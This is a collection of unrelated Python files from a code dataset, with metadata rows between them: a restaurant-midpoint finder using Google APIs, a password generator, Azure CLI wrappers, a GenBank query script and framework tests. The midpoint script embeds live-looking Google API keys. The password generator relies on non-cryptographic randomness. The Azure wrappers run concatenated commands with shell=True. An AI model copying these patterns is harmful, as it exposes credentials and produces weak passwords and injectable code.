- Make the acceptable radius of the midpoint establishment a percentage of the total distance between locations. Users traveling longer distances may be more willing to drive an extra few miles out of the way to visit a higher-rated establishment than users who plan on only walking a few city blocks to meet their friend.
- Take into consideration whether users will be driving, walking, public transportation as that can affect commuting time
- Explore whether I can connect Middle Ground with OpenTable to allow users to make a reservation
- Some results (McDonald's, Cozi, etc), while accurate, could be disappointing to users who are looking for a more elegant dining experience. Add a way for users to receive a second restaurant result if they are not happy with the first one. In some locations, chain restaurants may make up the bulk of available establishments, so I don't want to screen them out completely."""
| 66.306569 | 378 | 0.709489 | """Goal: Create a program where users can input two locations and return a restaurant as equidistant as possible between them.
This will be done by connecting with the GoogleMaps Directions and Places API.
Once a suitable establishment has been found, the program will return the establishment's name, address, phone number, and hours of operation.
If a restaurant can not be found within 500 meters of the midpoint, Middle Ground will automatically expand the radius to 5000 meters."""
#!/usr/bin/env python3
import requests, json, pprint
#The requests and json modules allow me to access the JSON response from the Google APIs
#pprint allows me to return the data to the user in a format that is easier to read
DIRECTIONS_API_KEY = 'AIzaSyDmLGPIUErCNSmM-FPFSUGS9LIPFv9cbRI' #GoogleMaps Directions API Key
PLACES_API_KEY = 'AIzaSyDR_0dNH_A30KWnjz3s7GG7PZw6Vo3WkDQ' #Google Places API Key
#I do not expect a lot of people to be accessing this program on GitHub currently, so I feel comfortable leaving in the API Keys and am not worried about going over the request limit.
print('Welcome to Middle Ground.\n\nPlease use the following guidelines for the best results:')
print('\n1. Make sure the addresses are spelled completely and correctly.\nAddresses are not case-sensitive and standard postal abbreviations are acceptable.')
print('\n2. Restart the program if you have made an error while typing either address.')
print('\n3. Since Middle Ground aims to find restaurants within 500 meters of the midpoint, it is best suited for use in densely populated areas.\n')
print('*****************************************************\n\n')
restart = 1
#This code gives users the option to restart the program or exit when finished
while restart != "X" and restart != "x":
street_address_a = input('Please enter the street address only of Person A. \nDo not include city or state: ')
city_a = input('Enter the city of Person A: ')
state_a = input('Enter the state of Person A: ')
updated_address_a = str(street_address_a) + ' ' + str(city_a) + ' ' + str(state_a)
street_address_b = input('\nPlease enter the street address only of Person B. \nDo not include city or state: ')
city_b = input('Enter the city of Person B: ')
state_b = input('Enter the state of Person B: ')
updated_address_b = str(street_address_b) + ' ' + str(city_b) + ' ' + str(state_b)
#Should add way for user to confirm the address is correct, with options to revise if there is a typo.
#Should add exception handling to confirm that the user's input is valid (e.g. not entering numbers or special characters instead of letters for city and state)
print('\nLet\'s find a restaurant at the midpoint of those locations!\nPlease wait... this may take a few moments.')
#I have gathered all the necessary information from the user, now I need to connect with the GoogleMaps Directions API
api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(updated_address_a, DIRECTIONS_API_KEY))
api_response_dict = api_response.json()
if api_response_dict['status'] == 'OK':
latitude_a = api_response_dict['results'][0]['geometry']['location']['lat']
longitude_a = api_response_dict['results'][0]['geometry']['location']['lng']
api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(updated_address_b, DIRECTIONS_API_KEY))
api_response_dict = api_response.json()
if api_response_dict['status'] == 'OK':
latitude_b = api_response_dict['results'][0]['geometry']['location']['lat']
longitude_b = api_response_dict['results'][0]['geometry']['location']['lng']
#Now that the latitude and longitude of both addresses has been pulled from the GoogleMaps Directions API, I am going to average them together to find a midpoint
def find_average(input_a, input_b):
return((input_a + input_b)/2)
average_latitude = find_average(latitude_a, latitude_b)
average_longitude = find_average(longitude_a, longitude_b)
list_places = requests.get('https://maps.googleapis.com/maps/api/place/radarsearch/json?location=' + str(average_latitude) + ',' + str(average_longitude) + '&radius=500&type=restaurant&key=' + str(PLACES_API_KEY))
list_places_dict = list_places.json()
if list_places_dict['status'] == 'OK':
#Checking to make sure there an establishment is found within 500 meters of the midpoint
place_id = list_places_dict['results'][0]['place_id']
#This pulls the Place ID of the first result on the list of bars and restaurants within 500 meters of the middle point
place_details = requests.get('https://maps.googleapis.com/maps/api/place/details/json?placeid=' + str(place_id) + '&key=' + str(PLACES_API_KEY))
place_details = place_details.json()
if place_details['status'] == 'OK':
place_name = place_details['result']['name']
place_address = place_details['result']['formatted_address']
place_phone = place_details['result']['formatted_phone_number']
place_hours = place_details['result']['opening_hours']['weekday_text']
print('\nYou should meet at ' + place_name)
#This is the name of the restaurant closest to the midpoint.
print(place_address)
print(place_phone)
pprint.pprint(place_hours)
#Using pprint module to print days and hours on separate lines
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
else:
print('\nI\'m sorry, I could not find a restaurant within 500 meters of the midpoint. \nI am now checking for a restaurant within 5000 meters.')
#This addition allows for more flexibility in suburban areas or if both addresses are not located in the same city.
list_places = requests.get('https://maps.googleapis.com/maps/api/place/radarsearch/json?location=' + str(average_latitude) + ',' + str(average_longitude) + '&radius=5000&type=restaurant&key=' + str(PLACES_API_KEY))
list_places_dict = list_places.json()
if list_places_dict['status'] == 'OK':
#Checking to make sure there an establishment is found within 5000 meters of the midpoint
place_id = list_places_dict['results'][0]['place_id']
#This pulls the Place ID of the first result on the list of bars and restaurants within 5000 meters of the middle point
place_details = requests.get('https://maps.googleapis.com/maps/api/place/details/json?placeid=' + str(place_id) + '&key=' + str(PLACES_API_KEY))
place_details = place_details.json()
if place_details['status'] == 'OK':
place_name = place_details['result']['name']
place_address = place_details['result']['formatted_address']
place_phone = place_details['result']['formatted_phone_number']
place_hours = place_details['result']['opening_hours']['weekday_text']
print('\nYou should meet at ' + place_name)
#This is the name of the restaurant closest to the midpoint.
print(place_address)
print(place_phone)
pprint.pprint(place_hours)
#Using pprint module to print days and hours on separate lines
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
else:
print('\nI\'m sorry, there does not appear to be a restaurant within 5000 meters of the midpoint. \nMiddle Ground is working on expanding functionality to less densely populated areas, so stay tuned for future updates!')
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
"""FUTURE IMPROVEMENTS:
- Give users the choice to input restaurant, bar, cafe, museum, or any of the other supported "types" on the Google Places API
- Return a list of establishment choices, with options to rank by distance from midpoint or Yelp rating
- Make the acceptable radius of the midpoint establishment a percentage of the total distance between locations. Users traveling longer distances may be more willing to drive an extra few miles out of the way to visit a higher-rated establishment than users who plan on only walking a few city blocks to meet their friend.
- Take into consideration whether users will be driving, walking, public transportation as that can affect commuting time
- Explore whether I can connect Middle Ground with OpenTable to allow users to make a reservation
- Some results (McDonald's, Cozi, etc), while accurate, could be disappointing to users who are looking for a more elegant dining experience. Add a way for users to receive a second restaurant result if they are not happy with the first one. In some locations, chain restaurants may make up the bulk of available establishments, so I don't want to screen them out completely."""
| 52 | 0 | 27 |
bd7345779b149c54a9813c23deec41c488f2c462 | 619 | py | Python | secpassgen.py | Boostonthebrain/securePasswordGenerator | 24b230c17d39ca986723947f8665e615f24b35b4 | [
"MIT"
] | null | null | null | secpassgen.py | Boostonthebrain/securePasswordGenerator | 24b230c17d39ca986723947f8665e615f24b35b4 | [
"MIT"
] | null | null | null | secpassgen.py | Boostonthebrain/securePasswordGenerator | 24b230c17d39ca986723947f8665e615f24b35b4 | [
"MIT"
] | null | null | null | #secure password generator
#written by boostOnTheBrain
import random
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*-=+_?"
length = int(input('password length?'))
password = ''
for c in range(length):
password += random.choice(characters)
print(password)
length = int(input('password length?'))
password = ''
for c in range(length):
password += random.choice(characters)
print(password)
length = int(input('password length?'))
password = ''
for c in range(length):
password += random.choice(characters)
print(password)
input("PRESS ENTER TO EXIT") | 24.76 | 91 | 0.712439 | #secure password generator
#written by boostOnTheBrain
import random
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*-=+_?"
length = int(input('password length?'))
password = ''
for c in range(length):
password += random.choice(characters)
print(password)
length = int(input('password length?'))
password = ''
for c in range(length):
password += random.choice(characters)
print(password)
length = int(input('password length?'))
password = ''
for c in range(length):
password += random.choice(characters)
print(password)
input("PRESS ENTER TO EXIT") | 0 | 0 | 0 |
70ac3a1bfd8d090df7560b741d9c9e80e5abdaa1 | 3,469 | py | Python | test/pyaz/network/application_gateway/rewrite_rule/condition/__init__.py | bigdatamoore/py-az-cli | 54383a4ee7cc77556f6183e74e992eec95b28e01 | [
"MIT"
] | null | null | null | test/pyaz/network/application_gateway/rewrite_rule/condition/__init__.py | bigdatamoore/py-az-cli | 54383a4ee7cc77556f6183e74e992eec95b28e01 | [
"MIT"
] | 9 | 2021-09-24T16:37:24.000Z | 2021-12-24T00:39:19.000Z | test/pyaz/network/application_gateway/rewrite_rule/condition/__init__.py | bigdatamoore/py-az-cli | 54383a4ee7cc77556f6183e74e992eec95b28e01 | [
"MIT"
] | null | null | null | import json, subprocess
from ..... pyaz_utils import get_cli_name, get_params
| 39.420455 | 188 | 0.688671 | import json, subprocess
from ..... pyaz_utils import get_cli_name, get_params
def create(resource_group, gateway_name, rule_set_name, rule_name, variable, pattern=None, ignore_case=None, negate=None, no_wait=None):
params = get_params(locals())
command = "az network application-gateway rewrite-rule condition create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(resource_group, gateway_name, rule_set_name, rule_name, variable):
params = get_params(locals())
command = "az network application-gateway rewrite-rule condition show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(resource_group, gateway_name, rule_set_name, rule_name):
params = get_params(locals())
command = "az network application-gateway rewrite-rule condition list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(resource_group, gateway_name, rule_set_name, rule_name, variable, no_wait=None):
params = get_params(locals())
command = "az network application-gateway rewrite-rule condition delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(resource_group, gateway_name, rule_set_name, rule_name, variable, pattern=None, ignore_case=None, negate=None, set=None, add=None, remove=None, force_string=None, no_wait=None):
params = get_params(locals())
command = "az network application-gateway rewrite-rule condition update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list_server_variables():
params = get_params(locals())
command = "az network application-gateway rewrite-rule condition list-server-variables " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 3,240 | 0 | 150 |
be83192f6c91989b488f2039a459419f2fad99a0 | 1,423 | py | Python | python-client/src/gabriel_client/push_source.py | cmusatyalab/gabriel | 5761fa61d7fa1a17b4af1a9b4dd5faca8ffe6c3c | [
"Apache-2.0"
] | 50 | 2015-02-03T21:48:33.000Z | 2021-09-26T22:50:52.000Z | python-client/src/gabriel_client/push_source.py | cmusatyalab/gabriel | 5761fa61d7fa1a17b4af1a9b4dd5faca8ffe6c3c | [
"Apache-2.0"
] | 13 | 2017-01-18T13:47:41.000Z | 2020-06-22T23:34:17.000Z | python-client/src/gabriel_client/push_source.py | cmusatyalab/gabriel | 5761fa61d7fa1a17b4af1a9b4dd5faca8ffe6c3c | [
"Apache-2.0"
] | 33 | 2015-05-30T21:30:29.000Z | 2021-09-26T23:14:41.000Z | import asyncio
import multiprocessing
from gabriel_protocol import gabriel_pb2
from gabriel_client.websocket_client import ProducerWrapper
| 32.340909 | 80 | 0.673226 | import asyncio
import multiprocessing
from gabriel_protocol import gabriel_pb2
from gabriel_client.websocket_client import ProducerWrapper
def consumer(_):
pass
class Source:
def __init__(self, source_name):
self._source_name = source_name
self._frame_available = asyncio.Event()
self._latest_input_frame = None
self._read, self._write = multiprocessing.Pipe(duplex=False)
self._added_callback = False
def get_producer_wrapper(self):
def reader_callback():
input_frame = gabriel_pb2.InputFrame()
input_frame.ParseFromString(self._read.recv_bytes())
self._latest_input_frame = input_frame
self._frame_available.set()
async def producer():
if not self._added_callback:
# We need this to be run on the event loop running the producer
fd = self._read.fileno()
asyncio.get_event_loop().add_reader(fd, reader_callback)
self._added_callback = True
await self._frame_available.wait()
# Clear because we are sending self._latest_input_frame
self._frame_available.clear()
return self._latest_input_frame
return ProducerWrapper(producer=producer, source_name=self._source_name)
def send(self, input_frame):
self._write.send_bytes(input_frame.SerializeToString())
| 1,164 | -8 | 126 |
ddd0fec714f1055c9950ed597a56150c4a0904eb | 464 | py | Python | define_conceito.py | VGloria23/Curso_PPT | 8468103e877101f03e2b808415cb55b7688661ed | [
"MIT"
] | null | null | null | define_conceito.py | VGloria23/Curso_PPT | 8468103e877101f03e2b808415cb55b7688661ed | [
"MIT"
] | null | null | null | define_conceito.py | VGloria23/Curso_PPT | 8468103e877101f03e2b808415cb55b7688661ed | [
"MIT"
] | null | null | null |
nota = float(input('Insira a pontuação: '))
computar_notas(nota) | 25.777778 | 45 | 0.403017 | def computar_notas(n):
try:
if n >= 0.9 and n <= 1:
nota = 'A'
elif n >= 0.8 and n < 0.9:
nota = 'B'
elif n >= 0.7 and n < 0.8:
nota = 'C'
elif n >= 0.6 and n < 0.7:
nota = 'D'
elif n < 0.6:
nota = 'F'
print(nota)
except:
print('Pontuação inválida')
nota = float(input('Insira a pontuação: '))
computar_notas(nota) | 369 | 0 | 23 |
25bd6b60e62fd7b594d426106c9549541e986267 | 324 | py | Python | src/builder.py | majkrzak/kot | 1ef7ee448d460bb46613c8400743b7c4185a2ed2 | [
"MIT"
] | 1 | 2019-10-06T12:00:41.000Z | 2019-10-06T12:00:41.000Z | src/builder.py | majkrzak/kot | 1ef7ee448d460bb46613c8400743b7c4185a2ed2 | [
"MIT"
] | 14 | 2019-10-06T12:31:11.000Z | 2019-10-16T08:05:33.000Z | src/builder.py | majkrzak/kot | 1ef7ee448d460bb46613c8400743b7c4185a2ed2 | [
"MIT"
] | 4 | 2019-10-06T12:41:18.000Z | 2019-10-08T01:57:21.000Z | from subprocess import run
| 21.6 | 118 | 0.509259 | from subprocess import run
class Builder:
dir: str
def __init__(self, dir):
self.dir = dir
def __call__(self, modules):
run(f'''kotlinc {' '.join(modules)} -cp $(find .lib -name "*.jar" | xargs | sed 's/ /:/g') -d {self.dir}/''',
shell=True,
check=True
)
| 213 | 60 | 23 |
c4d354a7574e9815edb9e4f5717088c3fb0524a6 | 4,145 | py | Python | src/primaires/scripting/actions/affecter.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | src/primaires/scripting/actions/affecter.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | src/primaires/scripting/actions/affecter.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | # -*-coding:Utf-8 -*
# Copyright (c) 2012 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant l'action affecter."""
from primaires.format.fonctions import supprimer_accents
from primaires.perso.exceptions.action import ExceptionAction
from primaires.scripting.action import Action
from primaires.scripting.instruction import ErreurExecution
class ClasseAction(Action):
"""Donne une affection à un personnage ou une salle."""
@classmethod
@staticmethod
def affecter_personnage(personnage, affection, duree, force):
"""Donne l'affection au personnage.
Les paramètres à préciser sont :
* personnage : le personnage à affecter
* affection : la clé de l'affection sous la forme d'une chaîne
* duree : la durée de l'affection
* force : la force de l'affection
Si le personnage est déjà affecté par la même affection, les
nouvelles valeurs sont modulées (le résultat final dépend de
l'affection choisie).
Généralement, la durée et la force sont ajoutées aux anciennes
valeurs.
"""
# Essaye de trouver l'affection
cle = affection.lower()
try:
affection = importeur.affection.get_affection("personnage", cle)
except KeyError:
raise ErreurExecution("l'affection {} n'existe pas".format(repr(
cle)))
personnage.affecte(cle, int(duree), int(force))
@staticmethod
def affecter_salle(salle, affection, duree, force):
"""Donne l'affection à la salle.
Les paramètres à préciser sont :
* salle : la salle à affecter
* affection : la clé de l'affection sous la forme d'une chaîne
* duree : la durée de l'affection
* force : la force de l'affection
Si la salle est déjà affectée par la même affection, les
nouvelles valeurs sont modulées (le résultat final dépend de
l'affection choisie).
Généralement, la durée et la force sont ajoutées aux anciennes
valeurs.
"""
# Essaye de trouver l'affection
cle = affection.lower()
try:
affection = importeur.affection.get_affection("salle", cle)
except KeyError:
raise ErreurExecution("l'affection {} n'existe pas".format(repr(
cle)))
salle.affecte(cle, int(duree), int(force))
| 39.103774 | 79 | 0.691194 | # -*-coding:Utf-8 -*
# Copyright (c) 2012 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant l'action affecter."""
from primaires.format.fonctions import supprimer_accents
from primaires.perso.exceptions.action import ExceptionAction
from primaires.scripting.action import Action
from primaires.scripting.instruction import ErreurExecution
class ClasseAction(Action):
"""Donne une affection à un personnage ou une salle."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.affecter_personnage, "Personnage",
"str", "Fraction", "Fraction")
cls.ajouter_types(cls.affecter_salle, "Salle",
"str", "Fraction", "Fraction")
@staticmethod
def affecter_personnage(personnage, affection, duree, force):
"""Donne l'affection au personnage.
Les paramètres à préciser sont :
* personnage : le personnage à affecter
* affection : la clé de l'affection sous la forme d'une chaîne
* duree : la durée de l'affection
* force : la force de l'affection
Si le personnage est déjà affecté par la même affection, les
nouvelles valeurs sont modulées (le résultat final dépend de
l'affection choisie).
Généralement, la durée et la force sont ajoutées aux anciennes
valeurs.
"""
# Essaye de trouver l'affection
cle = affection.lower()
try:
affection = importeur.affection.get_affection("personnage", cle)
except KeyError:
raise ErreurExecution("l'affection {} n'existe pas".format(repr(
cle)))
personnage.affecte(cle, int(duree), int(force))
@staticmethod
def affecter_salle(salle, affection, duree, force):
"""Donne l'affection à la salle.
Les paramètres à préciser sont :
* salle : la salle à affecter
* affection : la clé de l'affection sous la forme d'une chaîne
* duree : la durée de l'affection
* force : la force de l'affection
Si la salle est déjà affectée par la même affection, les
nouvelles valeurs sont modulées (le résultat final dépend de
l'affection choisie).
Généralement, la durée et la force sont ajoutées aux anciennes
valeurs.
"""
# Essaye de trouver l'affection
cle = affection.lower()
try:
affection = importeur.affection.get_affection("salle", cle)
except KeyError:
raise ErreurExecution("l'affection {} n'existe pas".format(repr(
cle)))
salle.affecte(cle, int(duree), int(force))
| 213 | 0 | 26 |
19ac1f0595ce9589ef22aa484301b0725803e2b1 | 2,030 | py | Python | GenBankTools/Check_for_species_in_GenBank.py | magitz/ToolBox | 201d6e5aced576f057820c86276b27b0f90be381 | [
"MIT"
] | 3 | 2018-05-04T02:17:30.000Z | 2019-01-09T18:47:12.000Z | GenBankTools/Check_for_species_in_GenBank.py | magitz/ToolBox | 201d6e5aced576f057820c86276b27b0f90be381 | [
"MIT"
] | null | null | null | GenBankTools/Check_for_species_in_GenBank.py | magitz/ToolBox | 201d6e5aced576f057820c86276b27b0f90be381 | [
"MIT"
] | 4 | 2015-09-21T18:58:03.000Z | 2018-05-04T02:17:37.000Z | #!/usr/bin/env python
from Bio import Entrez
import os
import argparse
import time
# =====================================================
# Takes a list of species names and queries GenBank for
# that species. If any data are in GenBank, a file is
# written that has the GenBank IDs for that species.
#
# Matt Gitzendanner
# University of Florida
# 3/07/16
#
# =====================================================
#####################
# Options
#
# -i input file with list of species.
# -e email address used for Entrez
# -o Output folder
#####################
parser = argparse.ArgumentParser()
parser.add_argument("-i", help="input file with GenBank accession IDs")
parser.add_argument("-e", help="email address")
parser.add_argument("-o", help="output folder name")
args = parser.parse_args()
infile = args.i
Entrez.email = args.e #sets the email for Entrez.
OutputFolder= args.o
#Function to test for non-zero file size.
try:
IN=open(infile, 'r')
except IOError:
print "Can't open file", infile
for Line in IN:
Line=Line.strip('\n')
Organism= Line + "[Orgn]"
OutFile=os.path.join(OutputFolder, Line.replace(" ", "_"))
#Check if we've already done this species--look for non-zero output file.
#This allows rerunning to catch failed runs without redoing all.
if is_non_zero_file(OutFile):
pass
else:
for i in range(3, 0, -1):
try:
GBSeq = Entrez.esearch(db="nucleotide", term=Organism ) #Get the sequence
except:
if i == 1:
raise
print('Failed to connect. Retrying')
time.sleep(5) #Wait 5 seconds and try again.
else:
break
Record= Entrez.read(GBSeq)
if int(Record["Count"]) > 0:
print ("%s had %d records in GenBank" %(Line, int(Record["Count"])))
try:
OUT=open(OutFile, 'w')
except:
print ("Can't open file: %s" %(OutFile))
for id in Record["IdList"]:
OUT.write(id + "\n")
| 23.068182 | 82 | 0.619212 | #!/usr/bin/env python
from Bio import Entrez
import os
import argparse
import time
# =====================================================
# Takes a list of species names and queries GenBank for
# that species. If any data are in GenBank, a file is
# written that has the GenBank IDs for that species.
#
# Matt Gitzendanner
# University of Florida
# 3/07/16
#
# =====================================================
#####################
# Options
#
# -i input file with list of species.
# -e email address used for Entrez
# -o Output folder
#####################
parser = argparse.ArgumentParser()
parser.add_argument("-i", help="input file with GenBank accession IDs")
parser.add_argument("-e", help="email address")
parser.add_argument("-o", help="output folder name")
args = parser.parse_args()
infile = args.i
Entrez.email = args.e #sets the email for Entrez.
OutputFolder= args.o
#Function to test for non-zero file size.
def is_non_zero_file(fpath):
return True if os.path.isfile(fpath) and os.path.getsize(fpath) > 0 else False
try:
IN=open(infile, 'r')
except IOError:
print "Can't open file", infile
for Line in IN:
Line=Line.strip('\n')
Organism= Line + "[Orgn]"
OutFile=os.path.join(OutputFolder, Line.replace(" ", "_"))
#Check if we've already done this species--look for non-zero output file.
#This allows rerunning to catch failed runs without redoing all.
if is_non_zero_file(OutFile):
pass
else:
for i in range(3, 0, -1):
try:
GBSeq = Entrez.esearch(db="nucleotide", term=Organism ) #Get the sequence
except:
if i == 1:
raise
print('Failed to connect. Retrying')
time.sleep(5) #Wait 5 seconds and try again.
else:
break
Record= Entrez.read(GBSeq)
if int(Record["Count"]) > 0:
print ("%s had %d records in GenBank" %(Line, int(Record["Count"])))
try:
OUT=open(OutFile, 'w')
except:
print ("Can't open file: %s" %(OutFile))
for id in Record["IdList"]:
OUT.write(id + "\n")
| 92 | 0 | 22 |
20887970ba18de0600f5c4a4e74803b5be449f00 | 2,173 | py | Python | tests/patterns/observer.py | scVENUS/puremvc-python-standard-framework | 942bec84220fbc601e8064104199881271ad54c9 | [
"BSD-3-Clause"
] | 12 | 2015-01-26T03:48:00.000Z | 2021-12-13T06:08:28.000Z | tests/patterns/observer.py | scVENUS/puremvc-python-standard-framework | 942bec84220fbc601e8064104199881271ad54c9 | [
"BSD-3-Clause"
] | 4 | 2016-01-25T15:48:35.000Z | 2018-02-19T17:02:20.000Z | tests/patterns/observer.py | scVENUS/puremvc-python-standard-framework | 942bec84220fbc601e8064104199881271ad54c9 | [
"BSD-3-Clause"
] | 12 | 2015-09-02T03:49:52.000Z | 2021-01-24T15:23:59.000Z | import unittest
import puremvc.patterns.observer
class ObserverTest(unittest.TestCase):
"""ObserverTest: Test Observer Pattern"""
__observerTestVar = None
def testObserverAccessors(self):
"""ObserverTest: Test Observer Accessors"""
obsrvr = puremvc.patterns.observer.Observer(None,None)
obsrvr.setNotifyContext(self)
obsrvr.setNotifyMethod(self.__observerTestMethod)
note = puremvc.patterns.observer.Notification('ObserverTestNote',10)
obsrvr.notifyObserver(note)
self.assertEqual(True, self.__observerTestVar == 10)
def testObserverConstructor(self):
"""ObserverTest: Test Observer Constructor"""
obsrvr = puremvc.patterns.observer.Observer(self.__observerTestMethod,self)
note = puremvc.patterns.observer.Notification('ObserverTestNote',5)
obsrvr.notifyObserver(note)
self.assertEqual(True, self.__observerTestVar == 5)
def testCompareNotifyContext(self):
"""ObserverTest: Test compareNotifyContext()"""
obsrvr = puremvc.patterns.observer.Observer(self.__observerTestMethod, self)
negTestObj = object()
self.assertEqual(False, obsrvr.compareNotifyContext(negTestObj))
self.assertEqual(True, obsrvr.compareNotifyContext(self))
def testNameAccessors(self):
"""NotificationTest: Test Name Accessors"""
note = puremvc.patterns.observer.Notification('TestNote')
self.assertEqual(True, note.getName() == 'TestNote')
def testBodyAccessors(self):
"""NotificationTest: Test Body Accessors"""
note = puremvc.patterns.observer.Notification(None)
note.setBody(5)
self.assertEqual(True, note.getBody() == 5)
def testConstructor(self):
"""NotificationTest: Test Constructor"""
note = puremvc.patterns.observer.Notification('TestNote',5,'TestNoteType')
self.assertEqual(True, note.getName() == 'TestNote')
self.assertEqual(True, note.getBody() == 5)
self.assertEqual(True, note.getType() == 'TestNoteType')
| 31.492754 | 84 | 0.692131 | import unittest
import puremvc.patterns.observer
class ObserverTest(unittest.TestCase):
"""ObserverTest: Test Observer Pattern"""
__observerTestVar = None
def __observerTestMethod(self,note):
self.__observerTestVar = note.getBody()
def testObserverAccessors(self):
"""ObserverTest: Test Observer Accessors"""
obsrvr = puremvc.patterns.observer.Observer(None,None)
obsrvr.setNotifyContext(self)
obsrvr.setNotifyMethod(self.__observerTestMethod)
note = puremvc.patterns.observer.Notification('ObserverTestNote',10)
obsrvr.notifyObserver(note)
self.assertEqual(True, self.__observerTestVar == 10)
def testObserverConstructor(self):
"""ObserverTest: Test Observer Constructor"""
obsrvr = puremvc.patterns.observer.Observer(self.__observerTestMethod,self)
note = puremvc.patterns.observer.Notification('ObserverTestNote',5)
obsrvr.notifyObserver(note)
self.assertEqual(True, self.__observerTestVar == 5)
def testCompareNotifyContext(self):
"""ObserverTest: Test compareNotifyContext()"""
obsrvr = puremvc.patterns.observer.Observer(self.__observerTestMethod, self)
negTestObj = object()
self.assertEqual(False, obsrvr.compareNotifyContext(negTestObj))
self.assertEqual(True, obsrvr.compareNotifyContext(self))
def testNameAccessors(self):
"""NotificationTest: Test Name Accessors"""
note = puremvc.patterns.observer.Notification('TestNote')
self.assertEqual(True, note.getName() == 'TestNote')
def testBodyAccessors(self):
"""NotificationTest: Test Body Accessors"""
note = puremvc.patterns.observer.Notification(None)
note.setBody(5)
self.assertEqual(True, note.getBody() == 5)
